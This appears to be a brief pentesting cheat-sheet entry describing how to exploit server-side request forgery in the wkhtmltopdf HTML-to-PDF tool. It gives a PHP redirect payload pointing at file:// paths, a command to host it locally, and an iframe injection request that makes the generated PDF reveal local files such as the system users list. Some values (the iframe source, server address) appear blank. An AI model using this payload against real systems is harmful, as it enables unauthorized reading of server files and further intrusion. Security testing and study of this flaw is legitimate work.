wkhtmltopdf SSRF

Last modified: 2023-04-08


wkhtmltopdf is a command line tool to render HTML into PDF using Qt WebKit. It is vulnerable to SSRF.


Create a PHP payload to read local file.

<?php header('location:file://'.$_REQUEST['x']); ?>

Then start web server in local machine.

php -S

Send request to where wkhtmltopdf is affected. For example,

/htmltopdf?item=<iframe src= width=1000px height=1000px></iframe>

Now we can see the system users list via a generated PDF.